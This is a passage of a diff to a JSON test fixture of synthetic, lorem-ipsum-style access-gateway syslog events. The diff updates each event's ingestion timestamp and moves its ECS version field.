08:45:59 dol high quiratio[3386]: 01490511: :tisetq: tevelite: Initializing Access profile orporiss with max concurrent user sessions limit: 4739", "event": { - "ingested": "2021-06-09T10:31:52.608690500Z" + "ingested": "2021-12-14T14:42:51.960183368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2016/08/30 15:48:33 paquioff medium derit[4688]: 01490544: :hende: piscin: Received client info - https://mail.example.com/laboree/tfu.html?liqu=eporr#xeacomm", "event": { - "ingested": "2021-06-09T10:31:52.608695100Z" + "ingested": "2021-12-14T14:42:51.960183781Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2016/09/13 22:51:07 fugiatnu high tobea[2364]: 014d0001: :tateve: ctx: itinvol, SERVER : eavolup", "event": { - "ingested": "2021-06-09T10:31:52.608699200Z" + "ingested": "2021-12-14T14:42:51.960184292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2016/09/28 05:53:42 remag very-high abor[5983]: 01490103: :tquiin: tse: Retry Username 'tenimad'", "event": { - "ingested": "2021-06-09T10:31:52.608703100Z" + "ingested": "2021-12-14T14:42:51.960184665Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2016/10/12 12:56:16 niamqui low amcol[5625]: 01490113: :ipisci: gitsed: session.server.network.port is 4374", "event": { - "ingested": "2021-06-09T10:31:52.608706900Z" + "ingested": "2021-12-14T14:42:51.960185051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2016/10/26 19:58:50 nturma low cusant[4946]: 01490106: :etur: itecto: AD module: authentication with 'reetdol' failed: Preauthentication failed, principal name: totamre. success ercita", "event": { - "ingested": "2021-06-09T10:31:52.608710700Z" + "ingested": "2021-12-14T14:42:51.960185431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2016/11/10 03:01:24 proiden medium mvele[5737]: 014d0044: :aco: tio", "event": { - "ingested": "2021-06-09T10:31:52.608714400Z" + "ingested": "2021-12-14T14:42:51.960185818Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2016/11/24 10:03:59 quaea very-high mvel[1188]: 01490520: :porinc: tetur: xce", "event": { - "ingested": "2021-06-09T10:31:52.608718200Z" + "ingested": "2021-12-14T14:42:51.960186213Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2016/12/08 17:06:33 aincidu very-high uaeab[5960]: 01490008: :licabo: enimadmi: Connectivity resource utaliqu assigned", "event": { - "ingested": "2021-06-09T10:31:52.608721900Z" + "ingested": "2021-12-14T14:42:51.960186595Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2016/12/23 00:09:07 cola high oremi[1485]: 01490128: :ineavol: iosa: Webtop boNemoe assigned", "event": { - "ingested": "2021-06-09T10:31:52.608725700Z" + "ingested": "2021-12-14T14:42:51.960187086Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2017/01/06 07:11:41 Nequepor medium rem[5461]: 01490538: :esseq: adminima: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608729700Z" + "ingested": "2021-12-14T14:42:51.960187475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2017/01/20 14:14:16 ptateve very-high miurerep: 01490165: :toccaec: Access profile: fugi initialized with configuration snapshot catalog: labo", "event": { - "ingested": "2021-06-09T10:31:52.608733800Z" + "ingested": "2021-12-14T14:42:51.960187883Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2017/02/03 21:16:50 sBono high equ[4808]: 01490005: :amvo: siuta: Following rule urmagn from item dquia to ending temporin", "event": { - "ingested": "2021-06-09T10:31:52.608738300Z" + "ingested": "2021-12-14T14:42:51.960188275Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2017/02/18 04:19:24 iruredol very-high derit[5270]: 01490106: :atquo: cupi: AD module: authentication with 'strude' failed in allow: Preauthentication failed, principal name: dunt. success yCic", "event": { - "ingested": "2021-06-09T10:31:52.608744600Z" + "ingested": "2021-12-14T14:42:51.960188662Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2017/03/04 11:21:59 unte very-high ueipsa[748]: 011f0005: :cti: failure (Client side: vip=https://www5.example.com/olli/rever.html?rsp=oluptat#metco profile=ipv6-icmp pool=edolorin client_ip=10.104.110.134)", "event": { - "ingested": "2021-06-09T10:31:52.608749100Z" + "ingested": "2021-12-14T14:42:51.960189055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2017/03/18 18:24:33 ptasnula high syslog-ng[2638]: ill", "event": { - "ingested": "2021-06-09T10:31:52.608753700Z" + "ingested": "2021-12-14T14:42:51.960189449Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2017/04/02 01:27:07 caboNem medium laudan[7589]: 01490107: :oconse: mag: AD module: authentication with 'tob' failed: Client 'dolores2519.mail.host' not found in Kerberos database, principal name:deF itempo", "event": { - "ingested": "2021-06-09T10:31:52.608758300Z" + "ingested": "2021-12-14T14:42:51.960189841Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2017/04/16 08:29:41 meaque high mip[5899]: 01490107: :lamc: mvolupta: AD module: authentication with 'Utenima' failed: Clients credentials have been revoked, principal name: iqua@luptat2979.internal.local. unknown cididu", "event": { - "ingested": "2021-06-09T10:31:52.608762700Z" + "ingested": "2021-12-14T14:42:51.960190236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2017/04/30 15:32:16 atDuis medium nisiut: 01490166: :rumwri: Current snapshot ID: velill retrieved from session db for access profile: ore", "event": { - "ingested": "2021-06-09T10:31:52.608766800Z" + "ingested": "2021-12-14T14:42:51.960190641Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2017/05/14 22:34:50 uptat high amquisno: 0149016b: :uido: Completed snapshot creation: tla for access profile: mquiad", "event": { - "ingested": "2021-06-09T10:31:52.608771300Z" + "ingested": "2021-12-14T14:42:51.960191026Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2017/05/29 05:37:24 atur very-high ditau[4727]: 01490514: :piscivel: hend: Access encountered error: success. File: cepteur, Function: accept, Line: maliqu", "event": { - "ingested": "2021-06-09T10:31:52.608775600Z" + "ingested": "2021-12-14T14:42:51.960191533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2017/06/12 12:39:58 acon very-high sun[5971]: 01490501: :labori: porai: umiure", "event": { - "ingested": "2021-06-09T10:31:52.608780Z" + "ingested": "2021-12-14T14:42:51.960191930Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2017/06/26 19:42:33 eufug low uido[4318]: 01490500: :ici: snulap: New session from client IP 10.122.204.151 (ST=writte/CC=sitvo/C=ine) at VIP 10.169.101.161 Listener itessequ", "event": { - "ingested": "2021-06-09T10:31:52.608784200Z" + "ingested": "2021-12-14T14:42:51.960192316Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2017/07/11 02:45:07 udan low essequam[3682]: 01490113: :urQuis: etcon: session.server.network.protocol is onsequu", "event": { - "ingested": "2021-06-09T10:31:52.608788200Z" + "ingested": "2021-12-14T14:42:51.960192717Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2017/07/25 09:47:41 gelitse very-high arc[2412]: 01490013: :radip: upta: AD agent: Retrieving AAA server: tetura", "event": { - "ingested": "2021-06-09T10:31:52.608792200Z" + "ingested": "2021-12-14T14:42:51.960193101Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2017/08/08 16:50:15 imavenia low mquido[5899]: 01490517: :rnat: rur: success", "event": { - "ingested": "2021-06-09T10:31:52.608796800Z" + "ingested": "2021-12-14T14:42:51.960193482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2017/08/22 23:52:50 nonn high met[1580]: 01420002: : AUDIT - pid=2037 user=ptate folder=entsu module=conse status=failure cmd_data=ntut", "event": { - "ingested": "2021-06-09T10:31:52.608801Z" + "ingested": "2021-12-14T14:42:51.960193866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2017/09/06 06:55:24 iconsequ high idunt[571]: 01490549: :siuta: atev: Assigned PPP Dynamic IPv4: 10.6.32.7 Tunnel Type: exerci inesciu Resource: quid Client IP: 10.198.70.58 - orem", "event": { - "ingested": "2021-06-09T10:31:52.608805100Z" + "ingested": "2021-12-14T14:42:51.960194258Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2017/09/20 13:57:58 reetdo medium lup[5051]: 01260009: :eos: Connection error:ipitlabo", "event": { - "ingested": "2021-06-09T10:31:52.608811400Z" + "ingested": "2021-12-14T14:42:51.960194666Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2017/10/04 21:00:32 reprehen very-high syslog-ng[6438]: imid", "event": { - "ingested": "2021-06-09T10:31:52.608815900Z" + "ingested": "2021-12-14T14:42:51.960195049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2017/10/19 04:03:07 sunt very-high aturQu[7083]: 01490128: :tDuis: iqu: Webtop oriosamn assigned", "event": { - "ingested": "2021-06-09T10:31:52.608820200Z" + "ingested": "2021-12-14T14:42:51.960195489Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2017/11/02 11:05:41 iquip very-high sedquian[4212]: 01490004: :etdolore: magnaa: Executed agent 'sumquiad', return value iusmodt", "event": { - "ingested": "2021-06-09T10:31:52.608824900Z" + "ingested": "2021-12-14T14:42:51.960195872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2017/11/16 18:08:15 equam low eaqueip[5207]: 01490538: :aevitaed: byCic: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608829Z" + "ingested": "2021-12-14T14:42:51.960196265Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2017/12/01 01:10:49 xerc high eturad[1760]: 01490506: :nvol: enimadmi: Received User-Agent header: mobmail android 2.1.3.3150", "event": { - "ingested": "2021-06-09T10:31:52.608833100Z" + "ingested": "2021-12-14T14:42:51.960196650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2017/12/15 08:13:24 sumdolo medium rors[1935]: 01490538: :oremque: quaU: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608837100Z" + "ingested": "2021-12-14T14:42:51.960197042Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2017/12/29 15:15:58 ioff medium quioff: 0149016a: :iuntN: Initiating snapshot creation: ipis for access profile: itautfu", "event": { - "ingested": "2021-06-09T10:31:52.608841Z" + "ingested": "2021-12-14T14:42:51.960197437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2018/01/12 22:18:32 rchit medium roquisqu[5924]: 01490005: :iquid: evo: Following rule mcorpori from item mqu to ending pteursi", "event": { - "ingested": "2021-06-09T10:31:52.608845Z" + "ingested": "2021-12-14T14:42:51.960197949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2018/01/27 05:21:06 itessequ low fdeFinib[2580]: 01490128: :sumd: sectetur: Webtop edquian assigned", "event": { - "ingested": "2021-06-09T10:31:52.608848900Z" + "ingested": "2021-12-14T14:42:51.960198337Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2018/02/10 12:23:41 quiav low rit: 0149016a: :eumfu: Initiating snapshot creation: lors for access profile: oluptat", "event": { - "ingested": "2021-06-09T10:31:52.608852700Z" + "ingested": "2021-12-14T14:42:51.960198729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2018/02/24 19:26:15 oeiusmo very-high cusanti[5019]: 01420002: : AUDIT - pid=4996 user=rem folder=tseddoei module=teursint status=success cmd_data=remagnaa", "event": { - "ingested": "2021-06-09T10:31:52.608856500Z" + "ingested": "2021-12-14T14:42:51.960199117Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2018/03/11 02:28:49 ore low ovolupta: 0149016b: :volup: Completed snapshot creation: macc for access profile: ria", "event": { - "ingested": "2021-06-09T10:31:52.608860600Z" + "ingested": "2021-12-14T14:42:51.960199502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2018/03/25 09:31:24 uisau high irat[2943]: 01490549: :emsequi: ueporroq: Assigned PPP Dynamic IPv4: 10.142.213.80 Tunnel Type: tationu gnaaliq Resource: olore Client IP: 10.16.181.60 - ameaquei", "event": { - "ingested": "2021-06-09T10:31:52.608864400Z" + "ingested": "2021-12-14T14:42:51.960199985Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2018/04/08 16:33:58 liq low mvolupta: syslog-ng: ", "event": { - "ingested": "2021-06-09T10:31:52.608868300Z" + "ingested": "2021-12-14T14:42:51.960200370Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2018/04/22 23:36:32 exe high illum[2625]: 01490101: :emi: reprehen: Access profile: tvol configuration has been applied. Newly active generation count is: 5959", "event": { - "ingested": "2021-06-09T10:31:52.608872100Z" + "ingested": "2021-12-14T14:42:51.960200777Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2018/05/07 06:39:06 iumt medium nulapari[1973]: 01490500: :tsunt: rnat:oremi:ectobeat: New session from client IP 10.187.64.126 (ST=uasiarch/CC=Malor/C=boriosa) at VIP 10.47.99.72 Listener upt (Reputation=oremipsu)", "event": { - "ingested": "2021-06-09T10:31:52.608875900Z" + "ingested": "2021-12-14T14:42:51.960201162Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2018/05/21 13:41:41 sint low auditd[3376]: ctobeat", "event": { - "ingested": "2021-06-09T10:31:52.608879800Z" + "ingested": "2021-12-14T14:42:51.960201555Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2018/06/04 20:44:15 lorumw high tdolo[3872]: syslog-ng: ", "event": { - "ingested": "2021-06-09T10:31:52.608883500Z" + "ingested": "2021-12-14T14:42:51.960201937Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2018/06/19 03:46:49 namaliqu medium aeca[4543]: 014d0044: :autemv: sciveli", "event": { - "ingested": "2021-06-09T10:31:52.608887300Z" + "ingested": "2021-12-14T14:42:51.960202325Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2018/07/03 10:49:23 piciati medium ntin[4646]: 01260009: :rcitat: Connection error:cinge", "event": { - "ingested": "2021-06-09T10:31:52.608890900Z" + "ingested": "2021-12-14T14:42:51.960202701Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2018/07/17 17:51:58 iqui low litani[3126]: 01490142: :itanimi: onoru: data", "event": { - "ingested": "2021-06-09T10:31:52.608894800Z" + "ingested": "2021-12-14T14:42:51.960203094Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2018/08/01 00:54:32 uptatem high ruredol: 01490079: :iadeseru: loremagn: Access policy 'acons' configuration has changed.Access profile 'nimadmi' configuration changes need to be applied for the new configuration", "event": { - "ingested": "2021-06-09T10:31:52.608898600Z" + "ingested": "2021-12-14T14:42:51.960203489Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2018/08/15 07:57:06 lupt very-high eavolupt: 01490167: :uipe: Current snapshot ID: ipsa updated inside session db for access profile: con", "event": { - "ingested": "2021-06-09T10:31:52.608903300Z" + "ingested": "2021-12-14T14:42:51.960203876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2018/08/29 14:59:40 nesciu low ssequ[4877]: 01490008: :emse: emqui: Connectivity resource cipitla assigned", "event": { - "ingested": "2021-06-09T10:31:52.608907100Z" + "ingested": "2021-12-14T14:42:51.960204283Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2018/09/12 22:02:15 ionevo high ptate[52]: 01490102: :uira: todita: Access policy result: failure", "event": { - "ingested": "2021-06-09T10:31:52.608910900Z" + "ingested": "2021-12-14T14:42:51.960204674Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2018/09/27 05:04:49 iqu low tatis[7767]: 01490113: :reeufugi: sequines: session.server.network.protocol is minimve", "event": { - "ingested": "2021-06-09T10:31:52.608914600Z" + "ingested": "2021-12-14T14:42:51.960205061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2018/10/11 12:07:23 aborio low setquas: 014d0002: :nbyCi: runtmoll: SSOv2 Logon failed, config busBon form norumetM", "event": { - "ingested": "2021-06-09T10:31:52.608918500Z" + "ingested": "2021-12-14T14:42:51.960205453Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2018/10/25 19:09:57 billoinv high deomn[904]: 01490113: :mali: roinBCSe: session.server.network.port is 3959", "event": { - "ingested": "2021-06-09T10:31:52.608926Z" + "ingested": "2021-12-14T14:42:51.960205842Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2018/11/09 02:12:32 rch high sedd: 01490079: :atione: tvolup: Access policy 'oremeu' configuration has changed.Access profile 'lab' configuration changes need to be applied for the new configuration", "event": { - "ingested": "2021-06-09T10:31:52.608930Z" + "ingested": "2021-12-14T14:42:51.960206221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2018/11/23 09:15:06 urau medium upt[4762]: 01490538: :itaedict: eroi: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608934100Z" + "ingested": "2021-12-14T14:42:51.960207563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2018/12/07 16:17:40 reetdo low nidol[4345]: 01490113: :writtenb: atevelit: session.server.listener.name is ugitsed", "event": { - "ingested": "2021-06-09T10:31:52.608938400Z" + "ingested": "2021-12-14T14:42:51.960208018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2018/12/21 23:20:14 uatDuisa high ano[4054]: 01490102: :uunturm: iatn: Access policy result: unknown", "event": { - "ingested": "2021-06-09T10:31:52.608942500Z" + "ingested": "2021-12-14T14:42:51.960208512Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2019/01/05 06:22:49 psum very-high exerci[3923]: 01490113: :lumqu: moen: session.oinvento", "event": { - "ingested": "2021-06-09T10:31:52.608946400Z" + "ingested": "2021-12-14T14:42:51.960208911Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2019/01/19 13:25:23 volup very-high crond[4071]: (iconsequ) CMD (block)", "event": { - "ingested": "2021-06-09T10:31:52.608951400Z" + "ingested": "2021-12-14T14:42:51.960209306Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2019/02/02 20:27:57 archite high rem[6473]: 01490008: :emp: inBC: Connectivity resource did assigned", "event": { - "ingested": "2021-06-09T10:31:52.608955400Z" + "ingested": "2021-12-14T14:42:51.960209696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2019/02/17 03:30:32 etconse medium uinesci: 0149016a: :otamr: Initiating snapshot creation: tsed for access profile: rExc", "event": { - "ingested": "2021-06-09T10:31:52.608959500Z" + "ingested": "2021-12-14T14:42:51.960210079Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2019/03/03 10:33:06 omnisis very-high uptatema[7023]: 01490501: :stiaec: Cicero: ven", "event": { - "ingested": "2021-06-09T10:31:52.608963300Z" + "ingested": "2021-12-14T14:42:51.960210475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2019/03/17 17:35:40 cons low ine[870]: 011f0005: :amquisn: success (Client side: vip=https://example.net/equamn/scipi.txt?eiu=maliquam#gnama profile=rdp pool=squamest client_ip=10.24.113.101)", "event": { - "ingested": "2021-06-09T10:31:52.608967100Z" + "ingested": "2021-12-14T14:42:51.960210856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2019/04/01 00:38:14 uelaudan low teiru[4918]: 014d0044: :orinrep: pta", "event": { - "ingested": "2021-06-09T10:31:52.608970900Z" + "ingested": "2021-12-14T14:42:51.960211249Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2019/04/15 07:40:49 sis very-high rchite[7405]: 01490521: :rvelill: rors: Session statistics - bytes in:6092, bytes out: 1363", "event": { - "ingested": "2021-06-09T10:31:52.608974800Z" + "ingested": "2021-12-14T14:42:51.960211639Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2019/04/29 14:43:23 Nequepo high CROND[2977]: (emac) CMD (cancel)", "event": { - "ingested": "2021-06-09T10:31:52.608978600Z" + "ingested": "2021-12-14T14:42:51.960212032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2019/05/13 21:45:57 isci high ugiatn: 0149016b: :squa: Completed snapshot creation: deseru for access profile: aquioff", "event": { - "ingested": "2021-06-09T10:31:52.608982200Z" + "ingested": "2021-12-14T14:42:51.960212448Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2019/05/28 04:48:31 onsequat high giatq[7733]: 01490106: :imad: tura: AD module: authentication with 'equuntur' failed: Preauthentication failed, principal name: rve. success mqua", "event": { - "ingested": "2021-06-09T10:31:52.608986Z" + "ingested": "2021-12-14T14:42:51.960212845Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2019/06/11 11:51:06 utlabore very-high exea[2867]: 01490008: :amquisn: itquii: Connectivity resource imaven assigned", "event": { - "ingested": "2021-06-09T10:31:52.608989800Z" + "ingested": "2021-12-14T14:42:51.960213231Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2019/06/25 18:53:40 lloinve low nim[7673]: 01490511: :edquiac: psamvolu: Initializing Access profile teturad with max concurrent user sessions limit: 7783", "event": { - "ingested": "2021-06-09T10:31:52.608993400Z" + "ingested": "2021-12-14T14:42:51.960213637Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2019/07/10 01:56:14 tatemse low vitae[72]: 01490000: :samvolu: dip", "event": { - "ingested": "2021-06-09T10:31:52.608997200Z" + "ingested": "2021-12-14T14:42:51.960214024Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2019/07/24 08:58:48 Dui medium nostrude[7057]: 01490007: :ione: ecillum: Session variable 'maccu' set to ame", "event": { - "ingested": "2021-06-09T10:31:52.609001100Z" + "ingested": "2021-12-14T14:42:51.960214410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2019/08/07 16:01:23 reprehe medium enimipsa[2698]: 01490521: :samn: quisnos: Session statistics - bytes in:2132, bytes out: 2552", "event": { - "ingested": "2021-06-09T10:31:52.609005Z" + "ingested": "2021-12-14T14:42:51.960214800Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2019/08/21 23:03:57 Nequepor low temseq[613]: 01490019: :ostrumex: suscipi: AD agent: Query: query with '(sAMAccountName=xplicabo)' successful", "event": { - "ingested": "2021-06-09T10:31:52.609008800Z" + "ingested": "2021-12-14T14:42:51.960215199Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2019/09/05 06:06:31 ameaquei very-high uelaud[1306]: 01490544: :ameiu: utei: Received client info - https://internal.example.net/lumquid/oluptat.jpg?equepor=iosamn#erspicia", "event": { - "ingested": "2021-06-09T10:31:52.609012600Z" + "ingested": "2021-12-14T14:42:51.960215584Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2019/09/19 13:09:05 psumqui high ncu: 01490079: :quaturve: ciad: Access policy 'diconseq' configuration has changed.Access profile 'utod' configuration changes need to be applied for the new configuration", "event": { - "ingested": "2021-06-09T10:31:52.609016500Z" + "ingested": "2021-12-14T14:42:51.960215988Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2019/10/03 20:11:40 giatquo low dipisciv[5944]: 01490013: 